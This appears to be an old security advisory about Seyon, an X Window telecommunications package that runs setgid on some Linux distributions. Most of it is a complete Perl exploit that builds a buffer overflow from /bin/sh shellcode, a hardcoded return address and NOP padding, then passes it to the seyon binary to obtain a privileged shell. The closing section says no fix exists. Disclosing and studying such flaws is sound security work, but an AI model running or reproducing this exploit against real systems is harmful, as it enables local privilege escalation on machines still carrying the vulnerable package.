COMMAND

    Seyon

SYSTEMS AFFECTED

    Seyon

PROBLEM

    teleh0r found following.  Seyon which is a telecommunications
    package for the X Window System, is not intended to run as
    setuid/setgid, however, we believe that it does on some
    distributions.  On the DLD Distribution and Turbolinux Distro
    we believe it runs as setgid.

    #!/usr/bin/perl

    ## Seyon Exploit / Tested Version: Version 2.1 rev. 4b i586-Linux
    ## teleh0r@doglover.com / Tested rpm from: DLD Distribution (5.04)
    ##
    ## Greets: Scrippie, *@HWA, grazer, mixter, pr0ix, s\, jim
    ## http://www.digit-labs.org/ || http://teleh0r.cjb.net/


    $shellcode ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
                "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
                "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
                "\xff\xff/bin/sh";

    $ret = 0xbfffef64;
    $egg = 500;
    $len = 208;
    $nop = 'A';

    if (@ARGV == 1) {
        $offset = $ARGV[0];
    }

    $buffer .= "?"; #  (Length: 209)
    $new_ret = pack('l',($ret + $offset));

    print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
    sleep(1);

    for ($i = 0; $i < $len; $i += 4) {
        $buffer .= pack('l',($ret + $offset));
    }

    for ($i = 0; $i < ($egg - length($shellcode)); $i++) {
        $buffer .= $nop;
    }

    $buffer .= $shellcode; local($ENV{DISPLAY}) = '0:0';
    exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\"");

SOLUTION

    Nothing  yet.   Seyon  is  known  to  be  broken (and has been for
    years).  The author  can't be found, it  seems, so it should  have
    been removed  from all  distributions by  now.   According to  the
    Debian package's copyright, in May of 1999 the author changed  the
    license to GPL.